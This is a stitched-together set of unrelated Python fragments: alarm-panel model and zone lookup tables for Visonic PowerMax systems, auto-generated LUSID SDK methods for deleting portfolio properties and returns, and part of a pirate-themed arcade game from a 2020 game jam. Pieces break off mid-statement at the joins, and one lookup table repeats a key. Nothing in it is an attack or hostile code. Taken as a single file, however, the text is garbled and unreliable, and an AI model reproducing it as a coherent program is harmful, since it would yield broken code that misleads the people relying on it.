"0019" : "PowerMax SK", "001a" : "PowerMax SV", "001b" : "PowerMax T", "001e" : "PowerMax WSS", "001f" : "PowerMax Smith",
"0100" : "PowerMax+", "0103" : "PowerMax+ UK (3)", "0104" : "PowerMax+ JP", "0106" : "PowerMax+ CTA", "0108" : "PowerMax+",
"010a" : "PowerMax+ SH", "010b" : "PowerMax+ CF", "0112" : "PowerMax+ WSS", "0113" : "PowerMax+ 2INST",
"0114" : "PowerMax+ HL", "0115" : "PowerMax+ UK", "0116" : "PowerMax+ 2INST3", "0118" : "PowerMax+ CF",
"0119" : "PowerMax+ 2INST", "011a" : "PowerMax+", "011c" : "PowerMax+ WSS", "011d" : "PowerMax+ UK",
"0120" : "PowerMax+ 2INST33", "0121" : "PowerMax+", "0122" : "PowerMax+ CF", "0124" : "PowerMax+ UK",
"0127" : "PowerMax+ 2INST_MONITOR", "0128" : "PowerMax+ KeyOnOff", "0129" : "PowerMax+ 2INST_MONITOR",
"012a" : "PowerMax+ 2INST_MONITOR42", "012b" : "PowerMax+ 2INST33", "012c" : "PowerMax+ One Inst_1_44_0",
"012d" : "PowerMax+ CF_1_45_0", "012e" : "PowerMax+ SA_1_46", "012f" : "PowerMax+ UK_1_47", "0130" : "PowerMax+ SA UK_1_48",
"0132" : "PowerMax+ KeyOnOff 1_50", "0201" : "PowerMax Pro", "0202" : "PowerMax Pro-Nuon ",
"0204" : "PowerMax Pro-PortugalTelecom", "020a" : "PowerMax Pro-PortugalTelecom2", "020c" : "PowerMax HW-V9 Pro",
"020d" : "PowerMax ProSms", "0214" : "PowerMax Pro-PortugalTelecom_4_5_02", "0216" : "PowerMax HW-V9_4_5_02 Pro",
"0217" : "PowerMax ProSms_4_5_02", "0218" : "PowerMax UK_DD243_4_5_02 Pro M", "021b" : "PowerMax Pro-Part2__2_27",
"0223" : "PowerMax Pro Bell-Canada", "0301" : "PowerMax Complete", "0302" : "PowerMax Complete_NV",
"0303" : "PowerMax Complete-PortugalTelecom", "0307" : "PowerMax Complete_1_0_07", "0308" : "PowerMax Complete_NV_1_0_07",
"030a" : "PowerMax Complete_UK_DD243_1_1_03", "030b" : "PowerMax Complete_COUNTERFORCE_1_0_06", "0401" : "PowerMax Pro-Part",
"0402" : "PowerMax Pro-Part CellAdaptor", "0405" : "PowerMax Pro-Part_5_0_08", "0406" : "PowerMax Pro-Part CellAdaptor_5_2_04",
"0407" : "PowerMax Pro-Part KeyOnOff_5_0_08", "0408" : "PowerMax UK Pro-Part_5_0_08",
"0409" : "PowerMax SectorUK Pro-Part_5_0_08", "040a" : "PowerMax Pro-Part CP1 4_10", "040c" : "PowerMax Pro-Part_Cell_key_4_12",
"040d" : "PowerMax Pro-Part UK 4_13", "040e" : "PowerMax SectorUK Pro-Part_4_14", "040f" : "PowerMax Pro-Part UK 4_15",
"0410" : "PowerMax Pro-Part CP1 4_16", "0411" : "PowerMax NUON key 4_17", "0433" : "PowerMax Pro-Part2__4_51",
"0434" : "PowerMax UK Pro-Part2__4_52", "0436" : "PowerMax Pro-Part2__4_54", "0437" : "PowerMax Pro-Part2__4_55 (CP_01)",
"0438" : "PowerMax Pro-Part2__4_56", "0439" : "PowerMax Pro-Part2__4_57 (NUON)", "043a" : "PowerMax Pro 4_58",
"043c" : "PowerMax Pro 4_60", "043e" : "PowerMax Pro-Part2__4_62", "0440" : "PowerMax Pro-Part2__4_64",
"0442" : "PowerMax 4_66", "0443" : "PowerMax Pro 4_67", "0444" : "PowerMax Pro 4_68", "0445" : "PowerMax Pro 4_69",
"0446" : "PowerMax Pro-Part2__4_70", "0447" : "PowerMax 4_71", "0449" : "PowerMax 4_73", "044b" : "PowerMax Pro-Part2__4_75",
"0451" : "PowerMax Pro 4_81", "0452" : "PowerMax Pro 4_82", "0454" : "PowerMax 4_84", "0455" : "PowerMax 4_85",
"0456" : "PowerMax 4_86", "0503" : "PowerMax UK Complete partition 1_5_00", "050a" : "PowerMax Complete partition GPRS",
"050b" : "PowerMax Complete partition NV GPRS", "050c" : "PowerMax Complete partition GPRS NO-BBA",
"050d" : "PowerMax Complete partition NV GPRS NO-BBA", "050e" : "PowerMax Complete part. GPRS NO-BBA UK_5_14",
"0511" : "PowerMax Pro-Part CP1 GPRS 5_17", "0512" : "PowerMax Complete part. BBA UK_5_18",
"0533" : "PowerMax Complete part2 5_51", "0534" : "PowerMax Complete part2 5_52 (UK)",
"0536" : "PowerMax Complete 5_54 (GR)", "0537" : "PowerMax Complete 5_55", "053a" : "PowerMax Complete 5_58 (PT)",
"053b" : "PowerMax Complete part2 5_59 (NV)", "053c" : "PowerMax Complete 5_60", "053e" : "PowerMax Complete 5_62",
"053f" : "PowerMax Complete part2 5_63", "0540" : "PowerMax Complete 5_64", "0541" : "PowerMax Complete 5_65",
"0543" : "PowerMax Complete 5_67", "0544" : "PowerMax Complete 5_68", "0545" : "PowerMax Complete 5_69",
"0546" : "PowerMax Complete 5_70", "0547" : "PowerMax Complete 5_71", "0549" : "PowerMax Complete 5_73",
"054b" : "PowerMax Complete 5_75", "054f" : "PowerMax Complete 5_79", "0601" : "PowerMax Express",
"0603" : "PowerMax Express CP 01", "0605" : "PowerMax Express OEM 6_5", "0607" : "PowerMax Express BBA 6_7",
"0608" : "PowerMax Express CP 01 BBA 6_8", "0609" : "PowerMax Express OEM1 BBA 6_9", "060b" : "PowerMax Express BBA 6_11",
"0633" : "PowerMax Express 6_51", "063b" : "PowerMax Express 6_59", "063d" : "PowerMax Express 6_61",
"063e" : "PowerMax Express 6_62 (UK)", "0645" : "PowerMax Express 6_69", "0647" : "PowerMax Express 6_71",
"0648" : "PowerMax Express 6_72", "0649" : "PowerMax Express 6_73", "064a" : "PowerMax Activa 6_74",
"064c" : "PowerMax Express 6_76", "064d" : "PowerMax Express 6_77", "064e" : "PowerMax Express 6_78",
"064f" : "PowerMax Secure 6_79", "0650" : "PowerMax Express 6_80", "0650" : "PowerMax Express part2 M 6_80",
"0651" : "PowerMax Express 6_81", "0652" : "PowerMax Express 6_82", "0653" : "PowerMax Express 6_83",
"0654" : "PowerMax 6_84", "0655" : "PowerMax 6_85", "0658" : "PowerMax 6_88", "0659" : "PowerMax 6_89",
"065a" : "PowerMax 6_90", "065b" : "PowerMax 6_91", "0701" : "PowerMax PowerCode-G 7_1", "0702" : "PowerMax PowerCode-G 7_2",
"0704" : "PowerMaster10 7_4", "0705" : "PowerMaster10 7_05", "0707" : "PowerMaster10 7_07", "070c" : "PowerMaster10 7_12",
"070f" : "PowerMaster10 7_15", "0710" : "PowerMaster10 7_16", "0711" : "PowerMaster10 7_17", "0712" : "PowerMaster10 7_18",
"0713" : "PowerMaster10 7_19", "0802" : "PowerMax Complete PowerCode-G 8_2", "0803" : "PowerMaster30 8_3",
"080f" : "PowerMaster30 8_15", "0810" : "PowerMaster30 8_16", "0812" : "PowerMaster30 8_18", "0813" : "PowerMaster30 8_19",
"0815" : "PowerMaster30 8_21"
}
pmZoneType_t = {
"EN" : (
"Non-Alarm", "Emergency", "Flood", "Gas", "Delay 1", "Delay 2", "Interior-Follow", "Perimeter", "Perimeter-Follow",
"24 Hours Silent", "24 Hours Audible", "Fire", "Interior", "Home Delay", "Temperature", "Outdoor", "16" ),
"NL" : (
"Geen alarm", "Noodtoestand", "Water", "Gas", "Vertraagd 1", "Vertraagd 2", "Interieur volg", "Omtrek", "Omtrek volg",
"24 uurs stil", "24 uurs luid", "Brand", "Interieur", "Thuis vertraagd", "Temperatuur", "Buiten", "16" )
} # "Arming Key", "Guard" ??
# Zone names are taken from the panel, so no langauage support needed
pmZoneName_t = (
"Attic", "Back door", "Basement", "Bathroom", "Bedroom", "Child room", "Conservatory", "Play room", "Dining room", "Downstairs",
"Emergency", "Fire", "Front door", "Garage", "Garage door", "Guest room", "Hall", "Kitchen", "Laundry room", "Living room",
"Master bathroom", "Master bedroom", "Office", "Upstairs", "Utility room", "Yard", "Custom 1", "Custom 2", "Custom 3",
"Custom4", "Custom 5", "Not Installed"
)
pmZoneChime_t = {
"EN" : ("Off", "Melody", "Zone", "Invalid"),
"NL" : ("Uit", "Muziek", "Zone", "Invalid")
}
# Note: names need to match to VAR_xxx
pmZoneSensor_t = {
0x3 : "Motion", 0x4 : "Motion", 0x5 : "Magnet", 0x6 : "Magnet", 0x7 : "Magnet", 0xA : "Smoke", 0xB : "Gas", 0xC : "Motion", 0xF : "Wired"
} # unknown to date: Push Button, Flood, Universal
ZoneSensorMaster = collections.namedtuple("ZoneSensorMaster", 'name func' )
pmZoneSensorMaster_t = {
0x01 : ZoneSensorMaster("Next PG2", "Motion" ),
0x04 : ZoneSensorMaster("Next CAM PG2", "Camera" ),
0x16 : ZoneSensorMaster("SMD-426 PG2", "Smoke" ),
0x1A : ZoneSensorMaster("TMD-560 PG2", "Temperature" ),
0x2A : ZoneSensorMaster("MC-302 PG2", "Magnet"),
0xFE : ZoneSensorMaster("Wired", "Wired" )
}
class ElapsedFormatter():
def __init__(self):
self.start_time = time.time()
def format(self, record):
elapsed_seconds = record.created - self.start_time
#using timedelta here for convenient default formatting
elapsed = timedelta(seconds = elapsed_seconds)
return "{} <{: >5}> {: >8} {}".format(elapsed, | |
True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object, the HTTP status code, and the headers.
If the method is called asynchronously,
returns the request thread.
:rtype: (DeletedEntityResponse, int, HTTPHeaderDict)
"""
local_var_params = locals()
all_params = [
'scope',
'code',
'property_keys',
'effective_at'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_portfolio_properties" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'property_keys' is set
if self.api_client.client_side_validation and ('property_keys' not in local_var_params or # noqa: E501
local_var_params['property_keys'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `property_keys` when calling `delete_portfolio_properties`") # noqa: E501
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `delete_portfolio_properties`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `delete_portfolio_properties`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `delete_portfolio_properties`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `delete_portfolio_properties`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('code' in local_var_params and # noqa: E501
len(local_var_params['code']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `delete_portfolio_properties`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']): # noqa: E501
raise ApiValueError("Invalid value for parameter `code` when calling `delete_portfolio_properties`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scope' in local_var_params:
path_params['scope'] = local_var_params['scope'] # noqa: E501
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
query_params = []
if 'effective_at' in local_var_params and local_var_params['effective_at'] is not None: # noqa: E501
query_params.append(('effectiveAt', local_var_params['effective_at'])) # noqa: E501
if 'property_keys' in local_var_params and local_var_params['property_keys'] is not None: # noqa: E501
query_params.append(('propertyKeys', local_var_params['property_keys'])) # noqa: E501
collection_formats['propertyKeys'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# set the LUSID header
header_params['X-LUSID-SDK-Language'] = 'Python'
header_params['X-LUSID-SDK-Version'] = '0.11.3923'
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "DeletedEntityResponse",
400: "LusidValidationProblemDetails",
}
return self.api_client.call_api(
'/api/portfolios/{scope}/{code}/properties', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def delete_portfolio_returns(self, scope, code, return_scope, return_code, from_effective_at, to_effective_at, **kwargs): # noqa: E501
"""[EARLY ACCESS] DeletePortfolioReturns: Delete Returns # noqa: E501
Cancel one or more Returns which exist into the specified portfolio. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_portfolio_returns(scope, code, return_scope, return_code, from_effective_at, to_effective_at, async_req=True)
>>> result = thread.get()
:param scope: The scope of the Portfolio. (required)
:type scope: str
:param code: The code of the Portfolio. (required)
:type code: str
:param return_scope: The scope of the Returns. (required)
:type return_scope: str
:param return_code: The code of the Returns. (required)
:type return_code: str
:param from_effective_at: The start date from which to delete the Returns. (required)
:type from_effective_at: str
:param to_effective_at: The end date from which to delete the Returns. (required)
:type to_effective_at: str
:param period: The Period (Daily or Monthly) of the Returns to be deleted. Defaults to Daily.
:type period: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: DeletedEntityResponse
"""
kwargs['_return_http_data_only'] = True
return self.delete_portfolio_returns_with_http_info(scope, code, return_scope, return_code, from_effective_at, to_effective_at, **kwargs) # noqa: E501
def delete_portfolio_returns_with_http_info(self, scope, code, return_scope, return_code, from_effective_at, to_effective_at, **kwargs): # noqa: E501
"""[EARLY ACCESS] DeletePortfolioReturns: Delete Returns # noqa: E501
Cancel one or more Returns which exist into the specified portfolio. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_portfolio_returns_with_http_info(scope, code, return_scope, return_code, from_effective_at, to_effective_at, async_req=True)
>>> result = thread.get()
:param scope: The scope of the Portfolio. (required)
:type scope: str
:param code: The code of the Portfolio. (required)
:type code: str
:param return_scope: The scope of the Returns. (required)
:type return_scope: str
:param return_code: The code of the Returns. (required)
:type return_code: str
:param from_effective_at: The start date from which to delete the Returns. (required)
:type from_effective_at: str
:param to_effective_at: The end date from which to delete the Returns. (required)
:type to_effective_at: str
:param period: The Period (Daily or Monthly) of the Returns to be deleted. Defaults to Daily.
:type period: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object, the HTTP status code, and the headers.
If the method is called asynchronously,
returns the request thread.
:rtype: (DeletedEntityResponse, int, HTTPHeaderDict)
"""
local_var_params = locals()
all_params = [
'scope',
'code',
'return_scope',
'return_code',
'from_effective_at',
'to_effective_at',
'period'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_portfolio_returns" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'from_effective_at' is set
if self.api_client.client_side_validation and ('from_effective_at' not in local_var_params or # noqa: E501
local_var_params['from_effective_at'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `from_effective_at` when calling `delete_portfolio_returns`") # noqa: E501
# verify the required parameter 'to_effective_at' is set
if self.api_client.client_side_validation and ('to_effective_at' not in local_var_params or # noqa: E501
local_var_params['to_effective_at'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `to_effective_at` when calling `delete_portfolio_returns`") # noqa: E501
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `delete_portfolio_returns`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('scope' in local_var_params and # noqa: E501
len(local_var_params['scope']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `scope` when calling `delete_portfolio_returns`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and | |
"""
<NAME>
Domicidal
Python Discord | Game Jam 2020
"""
# Standard Library
from math import atan2, degrees, radians, sin, cos, sqrt
import os
from pathlib import Path
import random
import time
# Third Party
import arcade
import PIL
from pyglet import gl
# Local
from game.utils import pathfinding
# Ticks each animation frame is held before advancing.
UPDATES_PER_FRAME = 3
# Movement speeds; applied scaled by delta_time in the sprites' on_update,
# so effectively pixels per second.
PLAYER_MOVEMENT_SPEED = 150
SHIP_MOVEMENT_SPEED = 200
# Cannonball velocity is applied per update tick (not delta-time scaled).
CANNONBALL_SPEED = 20
# How many pixels to keep as a minimum margin between the character
# and the edge of the screen.
LEFT_VIEWPORT_MARGIN = 300
RIGHT_VIEWPORT_MARGIN = 300
BOTTOM_VIEWPORT_MARGIN = 50
TOP_VIEWPORT_MARGIN = 100
# Sprite scaling factors.
CHARACTER_SCALING = 0.5
SHIP_SCALING = 1
# Constants used to track if the player is facing left or right
# (also index into load_texture_pair results: 0 = right, 1 = left).
RIGHT_FACING = 0
LEFT_FACING = 1
MUSIC_VOLUME = 0.2
SCREEN_WIDTH = 1280
SCREEN_HEIGHT = 720
SCREEN_TITLE = "Brawn, Brain, and Bald"
# File paths for project and resources
path = {}
path['project'] = Path(os.path.dirname(__file__))
path['resources'] = path['project'] / "resources"
path['img'] = path['resources'] / "img"
path['sound'] = path['resources'] / "sound"
path['maps'] = path['resources'] / "maps"
def load_texture_pair(filename):
    """Load *filename* twice and return [normal, mirrored] textures.

    The mirrored copy lets a sprite face either direction without
    needing a second source image on disk.
    """
    normal = arcade.load_texture(filename)
    mirrored = arcade.load_texture(filename, mirrored=True)
    return [normal, mirrored]
class Weapon(arcade.Sprite):
    """Melee weapon sprite with 'stab' and 'cut' attack animations.

    Textures are loaded from ``img/<sprite_root>/<animation>/(1..N).png``;
    ``texture_dict`` maps each animation folder name to an ordered list of
    [right-facing, left-facing] texture pairs.
    """
    def __init__(self, sprite_root):
        super().__init__()
        sprite_path = path['img'] / sprite_root
        self.scale = 1
        self.texture_dict = {}
        # One entry per animation sub-folder; frames are named "(1).png",
        # "(2).png", ... so range() walks them in order.
        for i in os.listdir(sprite_path):
            self.texture_dict[i] = []
            for j in range(1, len(os.listdir(sprite_path / i))+1):
                self.texture_dict[i].append(load_texture_pair(
                    sprite_path / i / f"({j}).png"))
        # Resting texture: first stab frame, right-facing.
        self.texture = self.texture_dict['sword_stab'][0][0]
        self.is_stab = False       # stab animation currently playing
        self.is_cut = False        # cut animation currently playing
        self.cur_stab_texture = 0  # tick counters (frame = ticks // UPDATES_PER_FRAME)
        self.cur_cut_texture = 0
        # print(self.texture_dict)
    def update_animation(self):
        """Advance whichever attack animation is active by one tick.

        Each frame is shown for UPDATES_PER_FRAME ticks; reaching the
        last frame clears the flag and resets the counter.
        """
        # Attack animation
        if self.is_stab:
            frames = self.cur_stab_texture // UPDATES_PER_FRAME
            if frames == len(self.texture_dict['sword_stab'])-1:
                self.cur_stab_texture = 0
                self.is_stab = False
                return
            self.texture = self.texture_dict['sword_stab'][frames][0]
            self.cur_stab_texture += 1
        if self.is_cut:
            frames = self.cur_cut_texture // UPDATES_PER_FRAME
            if frames == len(self.texture_dict['sword_cut'])-1:
                self.cur_cut_texture = 0
                self.is_cut = False
                # Fall back to the resting (stab frame 0) texture when done.
                self.texture = self.texture_dict['sword_stab'][0][0]
                return
            self.texture = self.texture_dict['sword_cut'][frames][0]
            self.cur_cut_texture += 1
class Ship(arcade.Sprite):
    """Playable pirate ship.

    Texture slot 0 is the base image from *filename*; slots 1-3 are the
    progressively damaged hull images (50, 25 and 0 health artwork).
    """
    def __init__(self, filename):
        super().__init__(filename)
        self.name = 'Ship'
        self.health = 100
        self.scale = SHIP_SCALING
        damage_levels = (50, 25, 0)
        for level in damage_levels:
            hull = arcade.load_texture(
                path['img'] / 'ship' / f'ship_{level}.png')
            self.append_texture(hull)
class EnemyShip(arcade.Sprite):
    '''
    Enemy Ship.

    Spawns at a random position, sails toward ``self.target``, fires
    cannonballs port/starboard on a cooldown, and swaps to damaged hull
    textures (slots 1-3) as health drops.
    '''
    def __init__(self, filename):
        super().__init__(filename)
        self.name = 'Ship'
        self.health = 100
        self.scale = SHIP_SCALING
        self.speed = 20
        self.SAIL_SPEED_FACTOR = 0.5  # overall sail multiplier; zeroed on death
        self.set_position(
            random.randint(800, 2000), random.randint(400, 1000)
        )
        # Current sail destination (x, y); starts as the spawn point.
        self.target = (self.center_x, self.center_y)
        self.path_position = 1
        self.path = []
        self.cannonballs = arcade.SpriteList()
        # Damaged hull textures in slots 1..3 (50, 25, 0 health artwork).
        for i in (50, 25, 0):
            self.append_texture(
                arcade.load_texture(
                    path['img'] / 'enemy_ship' / f'ship_{i}.png'))
        self.fire_port = False        # request flags set by the game logic
        self.fire_starboard = False
        self.time_fired = 0           # wall-clock time of the last shot
        self.time_diff = 20           # seconds since last shot (starts > fire_rate)
        self.fire_rate = 3            # minimum seconds between shots
        self.collision_time = 0
        self.collision_time_diff = 0
    def move_to(self, delta_time):
        """Point the ship at ``self.target`` and set change_x/change_y toward it."""
        self.change_x = 0
        self.change_y = 0
        # target = (x, y)
        dx = self.target[0] - self.center_x
        dy = self.target[1] - self.center_y
        # +epsilon avoids division by zero when already at the target.
        magnitude = sqrt(dx**2 + dy**2)+0.00001
        # Sprite art faces "up", hence the +90 degree offset.
        self.angle = degrees(atan2(dy, dx)) % 360 + 90
        self.change_y = self.speed*dy/magnitude*10
        self.change_x = self.speed*dx/magnitude*10
        # print(f"""MOVING:{dy, dx, self.angle, self.change_x, self.change_y}
        # \n{self.path_position, self.path}""")
    def fire_cannonball(self, *direction):
        """Spawn a cannonball travelling out of one side of the ship.

        Expects one positional string: 'starboard' fires the opposite
        side (angle + 180); anything else (e.g. '') fires at self.angle.
        """
        fire_direction = self.angle
        if direction[0] == 'starboard':
            fire_direction += 180
        self.cannonball = arcade.Sprite(
            path['img'] / 'ship' / 'cannonBall.png', 1)
        start_x, start_y = self._get_position()
        self.cannonball.set_position(start_x, start_y)
        self.cannonball.change_x = cos(radians(
            fire_direction)) * CANNONBALL_SPEED
        self.cannonball.change_y = sin(radians(
            fire_direction)) * CANNONBALL_SPEED
        # print(self.angle % 360)
        self.cannonballs.append(self.cannonball)
    def kill_cannonball(self, cannonball):
        """Remove a cannonball once it leaves the playable area."""
        max_height, max_width = 10000, 10000
        if (cannonball.center_x < 0
                or cannonball.center_y < 0
                or cannonball._get_bottom() > max_height
                or cannonball._get_left() > max_width):
            cannonball.kill()
    def on_update(self, delta_time):
        """Per-frame update: sail, honour fire requests, advance cannonballs,
        and apply damage-state texture/speed changes."""
        self.move_to(delta_time)
        self.center_x += self.change_x*self.SAIL_SPEED_FACTOR*delta_time
        self.center_y += self.change_y*self.SAIL_SPEED_FACTOR*delta_time
        # Only fire if the cooldown elapsed and the ship is still alive.
        self.time_diff = time.time() - self.time_fired
        if self.time_diff >= self.fire_rate and self.health > 0:
            if self.fire_port:
                self.fire_cannonball('')
                self.time_fired = time.time()
                self.fire_port = False
            if self.fire_starboard:
                self.fire_cannonball('starboard')
                self.time_fired = time.time()
                self.fire_starboard = False
        for cannonball in self.cannonballs:
            cannonball.center_x += cannonball.change_x
            cannonball.center_y += cannonball.change_y
            self.kill_cannonball(cannonball)
        # Damage states: swap hull texture and slow the ship down.
        if int(self.health) in range(25, 51):
            self.set_texture(1)
            self.change_y *= 0.5
            self.change_x *= 0.5
        elif int(self.health) in range(1, 25):
            self.set_texture(2)
            self.change_y *= 0.25
            self.change_x *= 0.25
        # Death condition
        if int(self.health) <= 0:
            self.set_texture(3)
            self.SAIL_SPEED_FACTOR = 0
        self.collision_time_diff = time.time() - self.collision_time
        # print(self.center_x, self.center_y)
class Pirate(arcade.Sprite):
    """
    Player (and crew) character sprite.

    Textures live in ``img/<sprite_root>/<state>/<n>.png`` for the states
    run/idle/attack/hit/death; each entry of ``texture_dict`` is a list of
    [right-facing, left-facing] pairs indexed by ``character_face_direction``.
    """
    def __init__(self, sprite_root):
        super().__init__()
        self.name = sprite_root
        self.scale = CHARACTER_SCALING
        self.health = 100
        sprite_path = path['img'] / sprite_root
        self.texture_dict = {}
        self.texture_dict['run'] = [
            load_texture_pair(sprite_path / "run" / f"{i}.png")
            for i in range(1, len(os.listdir(sprite_path / "run"))+1)
        ]
        self.texture_dict['idle'] = [
            load_texture_pair(sprite_path / "idle" / f"{i}.png")
            for i in range(1, len(os.listdir(sprite_path / "idle"))+1)
        ]
        self.texture_dict['attack'] = [
            load_texture_pair(sprite_path / "attack" / f"{i}.png")
            for i in range(1, len(os.listdir(sprite_path / "attack"))+1)
        ]
        self.texture_dict['hit'] = [
            load_texture_pair(sprite_path / "hit" / f"{i}.png")
            for i in range(1, len(os.listdir(sprite_path / "hit"))+1)
        ]
        self.texture_dict['death'] = [
            load_texture_pair(sprite_path / "death" / f"{i}.png")
            for i in range(1, len(os.listdir(sprite_path / "death"))+1)
        ]
        self.texture = self.texture_dict['idle'][0][0]
        self.bottom = 0
        # Per-state tick counters; frame = ticks // UPDATES_PER_FRAME.
        self.cur_run_texture = 0
        self.cur_idle_texture = 0
        self.cur_attack_texture = 0
        self.cur_hit_texture = 0
        self.cur_death_texture = 0
        self.character_face_direction = RIGHT_FACING
        # Animation-state flags; checked in priority order in update_animation.
        self.is_idle = False
        self.is_attacking = False
        self.is_hit = False
        self.follower = False
    def update_animation(self):
        """Pick and advance the current animation.

        Priority: death > forced idle > hit > attack > standing-still
        default > run. Death is terminal: it holds the last frame.
        """
        # Figure out if we need to flip face left or right
        if self.change_x < 0 and self.character_face_direction == RIGHT_FACING:
            self.character_face_direction = LEFT_FACING
        elif (
            self.change_x > 0 and
            self.character_face_direction == LEFT_FACING
        ):
            self.character_face_direction = RIGHT_FACING
        # TODO: Create single function for each animation instead of repeating
        # all this code
        # Idle animation
        if self.health <= 0:
            # Dead: freeze in place and play death animation once.
            self.change_x, self.change_y = 0, 0
            frames = self.cur_death_texture // UPDATES_PER_FRAME
            if frames == len(self.texture_dict['death'])-1:
                return
            # print(self.name, frames)
            self.texture = self.texture_dict['death'][frames][
                self.character_face_direction
            ]
            self.cur_death_texture += 1
            return
        elif self.is_idle:
            frames = self.cur_idle_texture // UPDATES_PER_FRAME
            if frames == len(self.texture_dict['idle'])-1:
                self.cur_idle_texture = 0
            # print(self.name, frames)
            self.texture = self.texture_dict['idle'][frames][
                self.character_face_direction
            ]
            self.cur_idle_texture += 1
            return
        elif self.is_hit:
            frames = self.cur_hit_texture // UPDATES_PER_FRAME
            if frames == len(self.texture_dict['hit'])-1:
                self.cur_hit_texture = 0
                self.is_hit = False
                return
            # print(self.name, frames)
            self.texture = self.texture_dict['hit'][frames][
                self.character_face_direction
            ]
            self.cur_hit_texture += 1
            return
        # Attack animation
        elif self.is_attacking:
            frames = self.cur_attack_texture // UPDATES_PER_FRAME
            if frames == len(self.texture_dict['attack'])-1:
                self.cur_attack_texture = 0
                self.is_attacking = False
                return
            self.texture = self.texture_dict['attack'][frames][
                self.character_face_direction
            ]
            self.cur_attack_texture += 1
        # Default animation
        elif self.change_x == 0 and self.change_y == 0:
            # Standing still: show idle frame 0 and reset the counters.
            self.texture = self.texture_dict['idle'][0][
                self.character_face_direction
            ]
            (self.cur_run_texture, self.cur_idle_texture,
                self.cur_attack_texture) = (0, 0, 0)
            return
        # Walking animation
        else:
            frames = self.cur_run_texture // UPDATES_PER_FRAME
            if frames == len(self.texture_dict['run'])-1:
                self.cur_run_texture = 0
            self.texture = self.texture_dict['run'][frames][
                self.character_face_direction
            ]
            self.cur_run_texture += 1
    def pathfinding(self, target):
        # Placeholder; enemy pathfinding lives in Enemy_SpriteSheet.
        pass
    def on_update(self, delta_time):
        """Advance animation and apply delta-time-scaled movement."""
        self.update_animation()
        self.center_x += self.change_x * delta_time
        self.center_y += self.change_y * delta_time
class Enemy_SpriteSheet(arcade.Sprite):
